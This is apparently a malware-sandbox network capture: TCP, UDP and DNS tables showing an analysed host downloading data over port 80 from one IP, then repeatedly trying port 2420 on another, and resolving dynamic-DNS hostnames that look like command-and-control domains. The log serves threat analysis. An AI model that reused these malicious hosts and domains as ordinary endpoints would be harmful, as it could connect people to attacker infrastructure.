            Jan 27, 2021 19:12:27.417239904 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.417263031 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.417269945 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.417279959 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.417300940 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.417309046 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.417327881 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.417347908 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.417359114 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.417377949 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.417396069 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.417428017 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.417450905 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.417476892 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.417484045 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.417489052 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.417510986 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.417520046 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.417563915 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.417598009 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.417618036 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.417634010 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.417643070 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.417659044 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.417690039 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.417725086 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.417749882 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.417762995 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.417783022 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.417795897 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.417818069 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.417844057 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.417855978 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.417876005 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.417897940 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.417916059 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.417948008 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.417959929 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.417999983 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.418011904 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.418031931 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.418051004 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.418061972 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.418077946 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.418090105 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.418107033 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.418118000 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.418128014 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.418147087 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.418157101 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.418180943 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.418190956 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.418215036 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.418229103 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.418247938 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.418256998 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.418277025 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.418286085 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.418308973 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.418334961 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.418342113 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.418346882 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.418368101 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.418385029 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.418406010 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.418427944 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.418437958 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.418458939 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.418467999 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.418488979 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.418499947 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.418524027 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.418534994 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.418544054 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.418565989 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.418581009 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.418602943 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.418610096 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.418631077 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.418646097 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.418667078 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.418687105 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.418709040 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.418731928 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.418752909 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.418777943 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.418801069 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.418821096 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.418953896 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.418976068 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.418996096 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.419015884 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.419037104 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.419056892 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.419095993 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.419107914 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.419128895 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.419147015 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.419218063 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.419240952 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.419254065 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.419270992 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.419275045 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.419276953 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.419286013 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.419295073 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.419297934 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.419300079 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.419302940 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.419305086 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.419310093 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.419312000 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.419315100 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.419317007 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.419318914 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.419321060 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.419322968 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.419326067 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.419354916 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.419362068 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.419385910 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.419394970 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.419398069 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.419400930 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.419421911 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.419431925 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.419455051 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.419471025 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.419488907 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.419495106 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.419516087 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.419534922 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.419555902 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.419576883 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.419583082 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.419584990 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.419593096 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.419600964 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.419621944 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.419631004 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.419656038 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.419666052 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.419691086 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.419702053 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.419727087 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.419733047 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.419744968 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.419764996 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.419780970 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.419799089 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.419810057 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.419832945 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.419847012 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.419868946 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.419883013 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.419904947 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.419919968 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.419938087 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.419950962 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.419974089 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.419994116 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.420010090 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.420032024 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.420049906 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.420068979 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.420084953 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.420094013 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.420110941 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.420116901 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.420131922 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.420139074 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.420141935 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.420149088 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.420169115 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.420186043 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.420219898 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.420296907 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.420330048 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.420337915 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.420352936 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.420363903 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.420373917 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.420381069 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.420408010 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.420416117 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.420450926 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.420500040 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.420516014 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.420541048 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.420558929 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.420613050 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.420660973 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.420723915 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.420739889 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.420756102 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.420767069 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.420783997 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.420795918 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.420886040 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.420934916 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.420952082 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.420969009 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.420990944 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.421006918 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.421011925 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.421031952 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.421045065 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.421062946 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.421084881 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.421127081 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.421133995 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.421160936 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.421169043 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.421189070 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.421236992 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.421260118 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.421289921 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.421400070 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.421432018 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.421444893 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.421458960 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.421551943 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.421561956 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.421607018 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.421644926 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.421664000 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.421680927 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.421689987 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.421706915 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.421722889 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.421730995 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.421734095 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.421745062 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.421760082 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.421770096 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.421788931 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.421808004 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.421817064 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.421832085 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.421844959 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.421852112 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.421869040 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.421889067 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.421896935 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.421916008 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.421921015 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.421931028 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.421943903 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.421951056 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.421979904 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.422009945 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.422058105 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.422116995 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.422158003 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.422163963 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.422179937 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.422200918 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.422214985 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.422307968 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.422322989 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.422342062 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.422353029 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.422369003 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.422389984 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.422395945 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.422414064 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.422419071 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.422420979 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.422430992 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.422446012 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.422451973 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.422467947 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.422482967 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.422491074 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.422522068 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.422525883 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.422540903 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.422568083 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.422585964 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.422627926 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.422642946 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.422651052 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.422666073 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.422682047 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.422699928 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.422749043 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.422755003 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.422781944 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.422792912 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.422821045 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.426506996 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:28.185758114 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:36.947266102 CET491662420192.168.2.2246.243.219.32
            Jan 27, 2021 19:12:39.947181940 CET491662420192.168.2.2246.243.219.32
            Jan 27, 2021 19:12:45.953717947 CET491662420192.168.2.2246.243.219.32
            Jan 27, 2021 19:12:54.625088930 CET491672420192.168.2.2246.243.219.32
            Jan 27, 2021 19:12:57.639379025 CET491672420192.168.2.2246.243.219.32
            Jan 27, 2021 19:13:03.646128893 CET491672420192.168.2.2246.243.219.32
            Jan 27, 2021 19:13:14.170500994 CET491682420192.168.2.2246.243.219.32
            Jan 27, 2021 19:13:17.171971083 CET491682420192.168.2.2246.243.219.32
            Jan 27, 2021 19:13:23.178720951 CET491682420192.168.2.2246.243.219.32
            Jan 27, 2021 19:13:31.855209112 CET491692420192.168.2.2246.243.219.32
            Jan 27, 2021 19:13:34.863945961 CET491692420192.168.2.2246.243.219.32
            Jan 27, 2021 19:13:40.870702028 CET491692420192.168.2.2246.243.219.32
            Jan 27, 2021 19:13:49.491704941 CET491702420192.168.2.2246.243.219.32
            Jan 27, 2021 19:13:52.509120941 CET491702420192.168.2.2246.243.219.32
            Jan 27, 2021 19:13:58.520850897 CET491702420192.168.2.2246.243.219.32
            Jan 27, 2021 19:14:06.285761118 CET491712420192.168.2.2246.243.219.32
            Jan 27, 2021 19:14:09.285742998 CET491712420192.168.2.2246.243.219.32
            Jan 27, 2021 19:14:15.292346954 CET491712420192.168.2.2246.243.219.32
            Jan 27, 2021 19:14:23.378989935 CET491722420192.168.2.2246.243.219.32
            Jan 27, 2021 19:14:26.394052982 CET491722420192.168.2.2246.243.219.32
            Jan 27, 2021 19:14:32.400532007 CET491722420192.168.2.2246.243.219.32

            UDP Packets

            TimestampSource PortDest PortSource IPDest IP
            Jan 27, 2021 19:12:26.185738087 CET5219753192.168.2.228.8.8.8
            Jan 27, 2021 19:12:26.243801117 CET53521978.8.8.8192.168.2.22
            Jan 27, 2021 19:12:26.253725052 CET5309953192.168.2.228.8.8.8
            Jan 27, 2021 19:12:26.316358089 CET53530998.8.8.8192.168.2.22
            Jan 27, 2021 19:12:26.316696882 CET5309953192.168.2.228.8.8.8
            Jan 27, 2021 19:12:26.373219967 CET53530998.8.8.8192.168.2.22
            Jan 27, 2021 19:12:36.786773920 CET5283853192.168.2.228.8.8.8
            Jan 27, 2021 19:12:36.870922089 CET53528388.8.8.8192.168.2.22
            Jan 27, 2021 19:12:36.871509075 CET5283853192.168.2.228.8.8.8
            Jan 27, 2021 19:12:36.934432983 CET53528388.8.8.8192.168.2.22
            Jan 27, 2021 19:12:54.519083023 CET6120053192.168.2.228.8.8.8
            Jan 27, 2021 19:12:54.575504065 CET53612008.8.8.8192.168.2.22
            Jan 27, 2021 19:12:54.575916052 CET6120053192.168.2.228.8.8.8
            Jan 27, 2021 19:12:54.623795986 CET53612008.8.8.8192.168.2.22
            Jan 27, 2021 19:13:14.112723112 CET4954853192.168.2.228.8.8.8
            Jan 27, 2021 19:13:14.169197083 CET53495488.8.8.8192.168.2.22
            Jan 27, 2021 19:13:31.679816961 CET5562753192.168.2.228.8.8.8
            Jan 27, 2021 19:13:31.736298084 CET53556278.8.8.8192.168.2.22
            Jan 27, 2021 19:13:31.737483978 CET5562753192.168.2.228.8.8.8
            Jan 27, 2021 19:13:31.793814898 CET53556278.8.8.8192.168.2.22
            Jan 27, 2021 19:13:31.794747114 CET5562753192.168.2.228.8.8.8
            Jan 27, 2021 19:13:31.852606058 CET53556278.8.8.8192.168.2.22
            Jan 27, 2021 19:13:49.371983051 CET5600953192.168.2.228.8.8.8
            Jan 27, 2021 19:13:49.430886030 CET53560098.8.8.8192.168.2.22
            Jan 27, 2021 19:13:49.431859016 CET5600953192.168.2.228.8.8.8
            Jan 27, 2021 19:13:49.490283012 CET53560098.8.8.8192.168.2.22
            Jan 27, 2021 19:14:06.224828959 CET6186553192.168.2.228.8.8.8
            Jan 27, 2021 19:14:06.283364058 CET53618658.8.8.8192.168.2.22
            Jan 27, 2021 19:14:23.264394999 CET5517153192.168.2.228.8.8.8
            Jan 27, 2021 19:14:23.315639973 CET53551718.8.8.8192.168.2.22
            Jan 27, 2021 19:14:23.316215038 CET5517153192.168.2.228.8.8.8
            Jan 27, 2021 19:14:23.377532959 CET53551718.8.8.8192.168.2.22

            DNS Queries

            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
            Jan 27, 2021 19:12:26.185738087 CET192.168.2.228.8.8.80xc62bStandard query (0)manojvashanava234.sytes.netA (IP address)IN (0x0001)
            Jan 27, 2021 19:12:26.253725052 CET192.168.2.228.8.8.80x2d4bStandard query (0)manojvashanava234.sytes.netA (IP address)IN (0x0001)
            Jan 27, 2021 19:12:26.316696882 CET192.168.2.228.8.8.80x2d4bStandard query (0)manojvashanava234.sytes.netA (IP address)IN (0x0001)
            Jan 27, 2021 19:12:36.786773920 CET192.168.2.228.8.8.80x8e4aStandard query (0)dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.euA (IP address)IN (0x0001)
            Jan 27, 2021 19:12:36.871509075 CET192.168.2.228.8.8.80x8e4aStandard query (0)dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.euA (IP address)IN (0x0001)
            Jan 27, 2021 19:12:54.519083023 CET192.168.2.228.8.8.80xd5c3Standard query (0)dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.euA (IP address)IN (0x0001)
            Jan 27, 2021 19:12:54.575916052 CET192.168.2.228.8.8.80xd5c3Standard query (0)dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.euA (IP address)IN (0x0001)
            Jan 27, 2021 19:13:14.112723112 CET192.168.2.228.8.8.80x62a5Standard query (0)dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.euA (IP address)IN (0x0001)
            Jan 27, 2021 19:13:31.679816961 CET192.168.2.228.8.8.80x80acStandard query (0)dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.euA (IP address)IN (0x0001)
            Jan 27, 2021 19:13:31.737483978 CET192.168.2.228.8.8.80x80acStandard query (0)dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.euA (IP address)IN (0x0001)
